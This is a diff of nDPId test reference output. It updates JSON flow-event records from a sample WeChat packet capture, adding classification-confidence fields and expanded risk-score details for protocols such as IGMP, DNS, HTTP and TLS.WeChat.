-00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492171206877,"flow_last_seen":1492171210973,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171267294,"flow_last_seen":1492171269750,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","ndpi": {"proto":"Google","breed":"Acceptable","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171268754,"flow_last_seen":1492171273759,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -701,23 +701,23 @@
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171268427,"flow_last_seen":1492171273433,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171268472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166312,"flow_last_seen":1492171267294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171166440,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
